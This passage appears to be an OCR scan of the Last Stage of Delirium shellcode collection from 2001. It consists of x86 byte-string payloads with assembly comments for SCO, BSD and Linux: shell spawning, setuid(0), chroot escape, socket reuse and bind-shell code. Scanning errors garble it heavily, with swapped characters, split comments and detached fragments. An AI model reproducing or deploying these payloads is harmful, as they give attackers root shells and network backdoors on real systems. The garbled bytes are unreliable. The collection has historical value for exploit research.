"\x50" 


/* 


pushl 


%eax 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xb0\x02 " 


/* 


movb 


$0x02, %al 


*/ 


n \x50" 


/* 


pushl 


%eax 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xb0\xe6" 


/* 


movb 


$0xe6, %al 


*/ 


n \xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\x8b\xd8" 


/* 


movi 


%eax, %ebx 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x89\x47\x04" 


/* 


movi 


%eax, 0x4 (%edi) 


*/ 


"\x6a\xl0" 


/* 


pushb 


$0x10 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\x53" 


/* 


pushl 


%ebx 


*/ 


"\xb0\xe8" 


/* 


movb 


$0xe8, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\x6a\x05" 


/* 


pushb 


$0x05 


*/ 


"\x53" 


/* 


pushl 


%ebx 


*/ 


"\xb0\xe9" 


/* 


movb 


$0xe9, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\x53" 


/* 


pushl 


%ebx 


*/ 


"\xbO\xea " 


/* 


movb 


$Oxea, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\x8b\xd8" 


/* 


movi 


%eax, %ebx 


*/ 


"\x6a\x09" 


/* 


pushb 


$0x09 


*/ 


"\x53" 


/* 


pushl 


%ebx 


*/ 


"\x91 " 


/* 


xchgl 


%ecx, %eax 


*/ 


"\xbl\x03" 


/* 


movb 


$0x03, %cl 


*/ 


"\x49" 


/* 


deci 


%ecx 


*/ 


"\x89\x4c\x24 \x08 " 


/* 


movi 


%ecx, 0x8 (%esp) 


*/ 


"\x41" 


/* 


incl 


%ecx 


*/ 


"\xb0\x3e" 


/* 


movb 


$0x3e, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\xe2\xf4" 


/* 


loop 


<bindsckcode+61> 


*/ 


char jump[] = 










"\x8b\xc4 " 


/* 


movi 


%esp, %eax 


*/ 


"\xc3 " 


/* 


ret 




*/ 


gdefine FINDSCKPORTOFS 


39 








gdefine BINDSCKPORTOFS 


05 








gendif 











SCOfOpenServer,Unixwareg/x86 codes, file:x86-sco 

/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland * : / / Isd-pl . net / #*/ 

/*## asmcodes for openserver 5.0.4 unixware 7.0 x86 §*/ 

/* 

syscall %eax stack 



exec xOOb ret , ->path=" /bin/ksh" , -> [->aO=path, 0] 

exec xOOb ret, ->path=" /bin/ksh ", -> [->aO=path, ->al="-c", ->a2=cmd, 0] 

setuid x017 ret,uid=0 

mkdir x050 ret , —>path="b . . " ,mode= (each value is valid) 

chroot x03d ret,->path={ "b. . ", ". "} 

chdir xOOc ret,->path=" . . " 

ioctl x036 ret,sfd, TI_GETPEERNAME=0x5491 ,-> [mlen=0x91, len=0x91 , ->sadr= [ ] ] 

dose x006 ret , fd={0 , 1 , 2} 

dup x029 ret,sfd 
*/ 
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§if defined(X86) && ( defined(OPENSERVER) Il de fined (UNIXWARE) ) 



_shellcode [ ] = 


/* 


33+8 bytes 


*/ 


"\xeb\xla" 


/* 


jmp 


< shell code +28> 


*/ 


"\x33\xd2" 


/* 


xorl 


%edx, %edx 


*/ 


"\x58" 


/* 


popi 


%eax 


*/ 


"\x8d\x78\xl4" 


/* 


leal 


0x14 (%eax) , %edi 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\x92" 


/* 


xchgl 


%eax, %edx 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\x88\x42\x08" 


/* 


movb 


%al, 0x8 (%edx) 


*/ 


"\x83\xef\x3b" 


/* 


subì 


$0x3b, %edi 


*/ 


"\xb0\x9a" 


/* 


movb 


$0x9a, %al 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\x47" 


/* 


incl 


%edi 


*/ 


"\xb0\x07" 


/* 


movb 


$0x07, %al 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\xbO\xOb" 


/* 


movb 


$OxOb, %al 


*/ 


"\xe8\xel \xff\xff\xff" 


/* 


cali 


<shellcode+2> 


*/ 



"/bin/ksh " 



syscallcode [] = 


/* 


26 bytes 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\xeb\x09" 


/* 


jmp 


<syscallcode+l 3> 


*/ 


"\x5f" 


/* 


popi 


%edi 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\x47" 


/* 


incl 


%edi 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\x47" 


/* 


incl 


%edi 


*/ 


"\xaa " 


/* 


stosb 


%al, %es: (%edi) 


*/ 


"\x5e " 


/* 


popi 


%esi 


*/ 


"\xeb\xOd" 


/* 


jmp 


<syscallcode+26> 


*/ 


"\xe8 \xf2 \xff\xff\xff" 


/* 


cali 


<syscallcode+4> 


*/ 


"\x9a\xff\xff\xff\xff" 










"\x07\xff" 










"\xc3 " 


/* 


ret 




*/ 



shellcode [ ] = 


/* 


25+8 bytes 


*/ 


\xeb\xl2" 


/* 


jmp 


<shellcode+20> 


*/ 


\x33\xd2" 


/* 


xorl 


%edx, %edx 


*/ 


\x58" 


/* 


popi 


%eax 


*/ 


\x8d\x78\xl4" 


/* 


leal 


0x14 (%eax) , edi 


*/ 


\x57" 


/* 


pushl 


%edi 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


\x92 « 


/* 


xchgl 


%eax, %edx 


*/ 


\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


\x88\x42\x08" 


/* 


movb 


%al, 0x8 (%edx) 


*/ 


\xbO\xOb" 


/* 


movb 


$OxOb, %al 


*/ 


\xff\xd6" 


/* 


cali 


*%esi 


*/ 


\xe8\xe9\xff\xff\xff" 


/* 


cali 


<shellcode+2> 


*/ 


/bin/ksh " 











char 



cmdshellcode [ ] = 


/* 


36+12+cmdlen bytes 


*/ 


\xeb\xld" 


/* 


jmp 


<cmdshellcode+31> 


*/ 


\x33\xd2" 


/* 


xorl 


%edx, %edx 


*/ 


\x58" 


/* 


popi 


%eax 


*/ 


\x8d\x78\xac" 


/* 


leal 


-0x44 (%eax) , edi 


*/ 


\x57" 


/* 


pushl 


%edi 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\x88\x50\x08" 


/* 


movb 


%dl, 0x8 (%eax) 


*/ 


\x88\x50\x0b" 


/* 


movb 


%dl, Oxb(ieax) 


*/ 


\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


\x8d\x40\x09" 


/* 


leal 


0x09 (%eax) , %eax 


*/ 


\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


\x8d\x40\x03" 


/* 


leal 


0x03 (%eax) , %eax 


*/ 


\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


\x92 « 


/* 


xchgl 


%eax, %edx 


*/ 


\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


\xbO\xOb" 


/* 


movb 


$OxOb, %al 


*/ 


\xff\xd6" 


/* 


cali 


*%esi 


*/ 
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"/bin/ksh -c " 










/* command */ 

r 










char setuidcode [ ] = 


/* 


7 bytes 




*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xb0\xl7" 


/* 


movb 


$0x1 7, %al 


*/ 


n \xff\xd6" 

r 


/* 


cali 


*%esi 


*/ 


char chrootcode [ ] = 


/* 


40 bytes 


*/ 


"\x68""b. . . " 


/* 


pushl 


$0x2e2e2e62 


*/ 


"\x89\xe7" 


/* 


movi 


%esp, %edi 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x88\x47\x03" 


/* 


movb 


%al, 0x3(%edi) 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\xb0\x50" 


/* 


movb 


$0x50, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


n \xb0\x3d" 


/* 


movb 


$0x3d, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\x47" 


/* 


incl 


%edi 


*/ 


"\x33\xc9" 


/* 


xorl 


%ecx, %ecx 


*/ 


"\xbl\xff" 


/* 


movb 


$Oxff, %cl 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\xbO\xOc" 


/* 


movb 


$OxOc, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\xe2\xfa" 


/* 


loop 


<chroot code+28> 


*/ 


"\x47" 


/* 


incl 


%edi 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\xb0\x3d" 


/* 


movb 


$0x3d, %al 


*/ 


"\xff\xd6" 

f 


/* 


cali 


*%esi 


*/ 


#if de fined (UNIXWARE) 










char findsckcode[] = 


/* 


67 bytes 


*/ 


"\x56" 


/* 


pushl 


%esi 


*/ 


"\x5f" 


/* 


popi 


%edi 


*/ 


"\x83\xef\x7c" 


/* 


subì 


$0x7c, %edi 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\x8d\x4f\xl0" 


/* 


leal 


0x10 (%edi) , %ecx 


*/ 


"\xb0\x91 " 


/* 


movb 


$0x91, %al 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\x91 " 


/* 


xchgl 


%ecx, %eax 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\x95" 


/* 


xchgl 


%eax, %ebp 


*/ 


n \xb5\x54" 


/* 


movb 


$0x54, %ch 


*/ 


"\x51 " 


/* 


pushl 


%ecx 


*/ 


"\x66\xb9\x01\x01 " 


/* 


movw 


$0x0101, %cx 


*/ 


"\x51 " 


/* 


pushl 


%ecx 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\xb0\x36" 


/* 


movb 


$0x36, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\x59" 


/* 


popi 


%ecx 


*/ 


"\x33\xdb" 


/* 


xorl 


%ebx, %ebx 


*/ 


"\x3b\xc3 " 


/* 


empi 


%ebx, %eax 


*/ 


"\x75\x0a " 


/* 


jne 


<findsckcode+4 7> 


*/ 


" \x66\xbb\xl2 \x34" 


/* 


movw 


$0x1234, %bx 


*/ 


"\x66\x39\x5d\x02 " 


/* 


empw 


%bx, 0x2 (%ebp) 


*/ 


"\x74\x02 " 


/* 




<findsckcode+4 9> 


*/ 


"\xe2\xe6" 


/* 


loop 


<findsckcode+23> 


*/ 


"\x8b\xd9" 


/* 


movi 


%ecx, %ebx 


*/ 


"\xbl\x03" 


/* 


movb 


$0x03, %cl 


*/ 


"\x49" 


/* 


deci 


%ecx 


*/ 


"\x51 " 


/* 


pushl 


%ecx 


*/ 


"\xb0\x06" 


/* 


movb 


$0x06, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\x53 " 


/* 


pushl 


%ebx 


*/ 


"\xb0\x29" 


/* 


movb 


$0x29, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\x41" 


/* 


incl 


%ecx 


*/ 


"\xe2\xf2" 


/* 


loop 


<findsckcode+53> 


*/ 


#endif 
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char jump[] = 
"\x8b\xc4 " 
"\xc3 " 



/* movi 
/* ret 



iesp, %eax 



V 
*/ 



idefine FINDSCKPORTOFS 39 
idefine BINDSCKPORTOFS 05 
idefine SCO 



fFree,Net,OpengBSD/x86 codes, file: x86-bsd 

/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland 
/*## asmcodes for freebsd 3.4 openbsd 2.8 netbsd 1.5 x86 



*://l sd-pl.net/ #*/ 
#*/ 



/* 

syscall 

execve 

execve 

setuid 

mkdir 

chroot 

chdir 

getpeername 

socket 

bind 

listen 

accept 

dup2 

*/ 



%eax stack 



x03b ret , ->path=" /bin//sh" , -> [->a0=0] , 0 

x03b ret, ->path="/bin//sh" , -> [->aO=path, ->al="-c" , ->a2=cmd, 0] , 0 
xOll ret, uid=0 

x088 ret ,->path="b . . ",mode= (each value is valid) 

x03d ret,->path={"b. . ", « . "} 

xOOc ret , ->path=" . . " 

xOlf ret, sfd, ->sadr= [] , -> [len=OxlO] 

x061 ret , AF_INET=2 , S0CK_STREAM=1 , prot=0 

x068 ret, sfd, ->sadr= [Oxff, 2, hi, lo, 0, 0, 0, 0] ,-> [0x10] 

x06a ret, sfd, backlog=5 

xOle ret, sfd, 0, 0 

x05a ret, sfd, fd={0, 1, 2) 



iif defined(X86) SS ( de fined (OPENBSD) Il defined (FREEBSD) Il de fined (NETBSD) ) 



shellcode [ ] = 


/* 


23 bytes 


*/ 


\x31\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\x68 " "//sh " 


/* 


pushl 


$0x68732f2f 


*/ 


\x68 " "/bin " 


/* 


pushl 


$0x6e69622f 


*/ 


\x89\xe3" 


/* 


movi 


%esp, %ebx 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\x54 " 


/* 


pushl 


%esp 


*/ 


\x53" 


/* 


pushl 


%ebx 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\xb0\x3b" 


/* 


movb 


$0x3b, %al 


*/ 


\xcd\x80" 


/* 


int 


$0x80 


*/ 


cmdshellcode [ ] = 


/* 


44+cmdlen bytes 


*/ 


\xeb\x25" 


/* 


jmp 


<cmdshellcode+39> 


*/ 


\x59" 


/* 


popi 


%ecx 


*/ 


\x31\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\x68 " "//sh " 


/* 


pushl 


$0x68732f2f 


*/ 


\x68 " "/bin " 


/* 


pushl 


$0x6e69622f 


*/ 


\x89\xe3" 


/* 


movi 


%esp, %ebx 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\x66\x68 " "-c" 


/* 


pushw 


$0x632d 


*/ 


\x89\xe7" 


/* 


movi 


%esp, %edi 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\x51 " 


/* 


pushl 


%ecx 


*/ 


\x57" 


/* 


pushl 


%edi 


*/ 


\x53" 


/* 


pushl 


%ebx 


*/ 


\x89\xe7" 


/* 


movi 


%esp, %edi 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\x57" 


/* 


pushl 


%edi 


*/ 


\x53" 


/* 


pushl 


%ebx 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\xb0\x3b" 


/* 


movb 


$0x0b, %al 


*/ 


\xcd\x80" 


/* 


int 


$0x80 


*/ 


\xe8\xd6\xff\xff\xff" 


/* 


cali 


<cmdshellcode+2> 


*/ 



/* command */ 
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"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xb0\xl7" 


/* 


movb 


$0x1 7, %al 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xcd\x80" 

r 


/* 


int 


$0x80 


*/ 


char chrootcode [ ] = 


/* 


44 bytes 


*/ 


"\x68""b. . . " 


/* 


pushl 


$0x2e2e2e62 


*/ 


"\x89\xe7" 


/* 


movi 


%esp, %edi 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x88\x47\x03" 


/* 


movb 


%al, 0x3(%edi) 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\xb0\x88" 


/* 


movb 


$0x88, %al 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


n \xb0\x3d" 


/* 


movb 


$0x3d, %al 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\x47" 


/* 


incl 


%edi 


*/ 


"\x33\xc9" 


/* 


xorl 


%ecx, %ecx 


*/ 


"\xbl\xff" 


/* 


movb 


$Oxff, %cl 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xbO\xOc" 


/* 


movb 


$OxOc, %al 


*/ 


n \xcd\x80" 


/* 


int 


$0x80 


*/ 


"\xe2\xfa" 


/* 


loop 


<chroot code+31> 


*/ 


"\x47" 


/* 


incl 


%edi 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\xb0\x3d" 


/* 


movb 


$0x3d, %al 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


char findsckcode[] = 


/* 


59 bytes 


*/ 


"\x56" 


/* 


pushl 


%esi 


*/ 


"\x5f" 


/* 


popi 


%edi 


*/ 


"\x83\xef\x7c" 


/* 


subì 


$0x7c, %edi 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\xbO\xlO" 


/* 


movb 


$0x10, %al 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\x31\xc9" 


/* 


xorl 


%ecx, %ecx 


*/ 


"\xbl\xff" 


/* 


movb 


$Oxff, %cl 


*/ 


"\x51 " 


/* 


pushl 


%ecx 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\xbO\xlf" 


/* 


movb 


$Oxlf, %al 


*/ 


"\x51 " 


/* 


pushl 


%ecx 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\x59" 


/* 


popi 


%ecx 


*/ 


"\x59" 


/* 


popi 


%ecx 


*/ 


"\x33\xdb" 


/* 


xorl 


%ebx, %ebx 


*/ 


"\x3b\xc3 " 


/* 


empi 


%ebx, %eax 


*/ 


"\x75\x0a " 


/* 


jne 


<findsckcode+40> 


*/ 


" \x66\xbb\xl2 \x34" 


/* 


movw 


$0x1234, %bx 


*/ 


"\x66\x39\x5f\x02 " 


/* 


empw 


%bx, 0x2 (%edi) 


*/ 


"\x74\x02 " 


/* 


je 


<findsckcode+42> 


*/ 


n \xe2\xe4" 


/* 


loop 


<findsckcode+14> 


*/ 


"\x51 " 


/* 


pushl 


%ecx 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\x91 " 


/* 


xchgl 


%ecx, %eax 


*/ 


"\xbl\x03" 


/* 


movb 


$0x03, %cl 


*/ 


"\x49" 


/* 


deci 


%ecx 


*/ 


"\x89\x4c\x24\x08" 


/* 


movi 


%ecx, 0x8 (%esp) 


*/ 


"\x41" 


/* 


incl 


%ecx 


*/ 


"\xb0\x5a" 


/* 


movb 


$0x5a, %al 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\xe2\xf4" 


/* 


loop 


<findsckcode+4 7> 


*/ 


char bindsckcode [] = 


/* 


70 bytes 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x68 \xff\x02 \xl2\x34' 


/* 


pushl 


$0x341202ff 


*/ 


"\x89\xe7" 


/* 


movi 


%esp, %edi 


*/ 


» \v50 " 


/* 


pushl 


%eax 


*/ 
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x6a \x02 " 


/* 


xb0\x61" 


/* 


x50" 


/* 


xcd\x80" 


/* 


x8b\xd8 " 


/* 


x33\xc0" 


/* 


x89\x47\x04" 


/* 


x6a\xl0" 


/* 


x57" 


/* 


x53" 


/* 


xb0\x68" 


/* 


x50" 


/* 


xcd\x80" 


/* 


x6a \x05 " 


/* 


x53" 


/* 


xb0\x6a" 


/* 


x50" 


/* 


xcd\x80" 


/* 


x33\xc0" 


/* 


x50" 


/* 


x50" 


/* 


x53" 


/* 


xbO\xle" 


/* 


x50" 


/* 


xcd\x80" 


/* 


x50" 


/* 


x50" 


/* 


x91 " 


/* 


xbl\x03" 


/* 


x49" 


/* 


x89\x4c\x24\x08" 


/* 


x41" 


/* 


xb0\x5a " 


/* 


xcd\x80" 


/* 


xe2\xf4" 


/* 



char jump[] = 

"\x8b\xc4" /* 
"\xc3" /* 



idefine FINDSCKPORTOFS 32 
gdefine BINDSCKPORTOFS 05 
idefine BSD 



pushl 


$0x02 


*/ 


movb 


$0x61, %al 


*/ 


pushl 


%eax 


*/ 


int 


$0x80 


*/ 


movi 


%eax, %ebx 


*/ 


xorl 


%eax, %eax 


*/ 


movi 


%eax, 0x4 (%edi) 


*/ 


pushb 


$0x10 


*/ 


pushl 


%edi 


*/ 


pushl 


%ebx 


*/ 


movb 


$0x68, %al 


*/ 


pushl 


%eax 


*/ 


int 


$0x80 


*/ 


pushb 


$0x05 


*/ 


pushl 


%ebx 


*/ 


movb 


$0x6a, %al 


*/ 


pushl 


%eax 


*/ 


int 


$0x80 


*/ 


xorl 


%eax, %eax 


*/ 


pushl 


%eax 


*/ 


pushl 


%eax 


*/ 


pushl 


%ebx 


*/ 


movb 


$Oxle, %al 


*/ 


pushl 


%eax 


*/ 


int 


$0x80 


*/ 


pushl 


%eax 


*/ 


pushl 


%eax 


*/ 


xchgl 


%ecx, %eax 


*/ 


movb 


$0x03, %cl 


*/ 


deci 


%ecx 


*/ 


movi 


%ecx, 0x8 (%esp) 


*/ 


incl 


%ecx 


*/ 


movb 


$0x5a, %al 


*/ 


int 


$0x80 


*/ 


loop 


<bindsckcode+58> 


*/ 


movi 


%esp, %eax 


*/ 


ret 




*/ 



Linux/x86 codes, file: x86-linux 



/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland 
/*## asmcodes for linux (redhat 6.2) x86 



*:// 'lsd-pl.net/ #*/ 
#*/ 



/* 

syscall 

exec 

exec 

setuid 

mkdir 

chroot 

chdir 

socketcall 

socketcall 

socketcall 

socketcall 

socketcall 

dup2 

*/ 



%eax %ebx, %ecx, %edx 



xOOb ->path="/bin//sh ", -> [->a0=path, 0] 

xOOb ->path="/bin//sh ", -> [->a0=path, ->al="-c" , ->a2=cmd, 0] 
xOll uid=0 

x027 —>path="b . . ",mode=0 (each value is valid) 
x03d ->path={"b. . ", ". "} 
xOOc ->path=" . . " 

x066 getpeername=7 ,-> [sfd, ->sadr= [ ] , -> [len=OxlO] ] 

x066 socket=l,->[AF_INET=2, S0CK_STREAM=2 , prot=0] 

x066 bind=2, ->[sfd, ->sadr= [Oxff , 2, hi, lo, 0, 0, 0, 0] , len=OxlO] 

x066 listen=4,-> [sfd, backlog=102] 

x066 accept=5,-> [sfd, 0, 0] 

x03f sfd,fd=(2,l,0} 



#if defined(X86) && de fined (LINUX) 



char shellcode [] = 
"\x31\xc0" 
"\x50" 



/* 24 bytes 

/* xorl %eax, %eax 

/* pushl %eax 



*/ 
*/ 
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"\x68 " "/bin" 


/* 


pushl 


$0x6e69622f 


*/ 


"\x89\xe3" 


/* 


movi 


%esp, %ebx 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\x53" 


/* 


pushl 


%ebx 


*/ 


"\x89\xel " 


/* 


movi 


%esp, %ecx 


*/ 


"\x99" 


/* 


cdql 




*/ 


"\xbO\xOb" 


/* 


movb 


$OxOb, %al 


*/ 


n \xcd\x80" 


/* 


int 


$0x80 


*/ 



cmdshellcode [ ] = 


/* 


40+cmdlen bytes 


*/ 


\xeb\x22 " 


/* 


jmp 


<cmdshellcode+36> 


*/ 


\x59" 


/* 


popi 


%ecx 


*/ 


\x31\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\x68 « "//sh " 


/* 


pushl 


$0x68732f2f 


*/ 


\x68 " "/bin " 


/* 


pushl 


$0x6e69622f 


*/ 


\x89\xe3" 


/* 


movi 


%esp, %ebx 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\x66\x68 " "-c" 


/* 


pushw 


$0x632d 


*/ 


\x89\xe7" 


/* 


movi 


%esp, %edi 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\x51 " 


/* 


pushl 


%ecx 


*/ 


\x57" 


/* 


pushl 


%edi 


*/ 


\x53" 


/* 


pushl 


%ebx 


*/ 


\x89\xel " 


/* 


movi 


%esp, %ecx 


*/ 


\x99" 


/* 


cdql 




*/ 


\xbO\xOb" 


/* 


movb 


$OxOb, %al 


*/ 


\xcd\x80" 


/* 


int 


$0x80 


*/ 


\xe8\xd9\xff\xff\xff" 


/* 


cali 


<cmdshellcode+2> 


*/ 



/* command */ 



char setuidcode [ ] = /* 8 bytes */ 

"\x33\xc0" /* xorl %eax, %eax */ 

"\x31\xdb" /* xorl %ebx, %ebx */ 

"\xb0\xl7" /* movb $0x17, %al */ 

"\xcd\x80" /* int $0x80 */ 



chrootcode [ ] = 


/* 


37 bytes 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\x68""bb. . " 


/* 


pushl 


$0x2e2e6262 


*/ 


"\x89\xe3" 


/* 


movi 


%esp, %ebx 


*/ 


"\x43" 


/* 


incl 


%ebx 


*/ 


"\x33\xc9" 


/* 


xorl 


%ecx, %ecx 


*/ 


"\xb0\x27" 


/* 


movb 


$0x27, %al 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\xb0\x3d" 


/* 


movb 


$0x3d, %al 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\x43" 


/* 


incl 


%ebx 


*/ 


"\xbl\xff" 


/* 


movb 


$Oxff, %cl 


*/ 


"\xbO\xOc" 


/* 


movb 


$OxOc, %al 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\xe2\xfa" 


/* 


loop 


<chroot code+21 > 


*/ 


"\x43" 


/* 


incl 


%ebx 


*/ 


"\xb0\x3d" 


/* 


movb 


$0x3d, %al 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 



char findsckcode[] = 


/* 


72 byt 


es 


"\x31\xdb" 


/* 


xorl 


%ebx, %ebx 


"\x89\xe7" 


/* 


movi 


%esp, %edi 


"\x8d\x77\xl0" 


/* 


leal 


0x10 (%edi) , %esi 


"\x89\x77\x04" 


/* 


movi 


%esi, 0x4 (%edi) 


"\x8d\x4f\x20" 


/* 


leal 


0x20 (%edi) , %ecx 


"\x89\x4f\x08" 


/* 


movi 


%ecx, 0x8 (%edi) 


"\xb3\xl0" 


/* 


movb 


$0x10, ibi 


"\x89\xl9" 


/* 


movi 


%ebx, (%ecx) 


"\x31\xc9" 


/* 


xorl 


%ecx, %ecx 


"\xbl\xff" 


/* 


movb 


$Oxff, %cl 


"\x89\x0f" 


/* 


movi 


%ecx, (%edi) 


"\x51 " 


/* 


pushl 


%ecx 


"\x31\xc0" 


/* 


xorl 


%eax, %eax 



*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
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"\xb3\x07" 


/* 


movb 


$0x07, %bl 


*/ 


"\x89\xf9" 


/* 


movi 


%edi, %ecx 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\x59" 


/* 


popi 


%ecx 


*/ 


"\x31\xdb" 


/* 


xorl 


%ebx, %ebx 


*/ 


"\x39\xd8 " 


/* 


empi 


%ebx, %eax 


*/ 


"\x75\x0a " 


/* 


jne 


<findsckcode+54> 


*/ 


" \x66\xb8 \xl2 \x34 " 


/* 


movw 


$0x1234, %bx 


*/ 


"\x66\x39\x46\x02 " 


/* 


empw 


%bx, 0x2 (%esi) 


*/ 


"\x74\x02 " 


/* 


je 


<findsckcode+56> 


*/ 


"\xe2\xe0" 


/* 


loop 


<findsckcode+24> 


*/ 


"\x89\xcb" 


/* 


movi 


%ecx, %ebx 


*/ 


"\x31\xc9" 


/* 


xorl 


%ecx, %ecx 


*/ 


"\xbl\x03" 


/* 


movb 


$0x03, %cl 


*/ 


"\x31\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\xb0\x3f" 


/* 


movb 


$0x3f, %al 


*/ 


"\x49" 


/* 


deci 


%ecx 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\x41" 


/* 


incl 


%ecx 


*/ 


"\xe2\xf6" 


/* 


loop 


<findsckcode+62> 


*/ 


bindsckcode [] = 


/* 


73 bytes 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\x68 \xff\x02 \xl2\x34" 


/* 


pushl 


$0x341202ff 


*/ 


"\x89\xe7" 


/* 


movi 


%esp, %edi 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\x6a\x01 " 


/* 


pushb 


$0x01 


*/ 


"\x6a\x02 " 


/* 


pushb 


$0x02 


*/ 


"\x89\xel " 


/* 


movi 


%esp, %ecx 


*/ 


"\xb0\x66" 


/* 


movb 


$0x66, %al 


*/ 


"\x31\xdb" 


/* 


xorl 


%ebx, %ebx 


*/ 


"\x43" 


/* 


incl 


%ebx 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\x6a\xl0" 


/* 


pushb 


$0x10 


*/ 


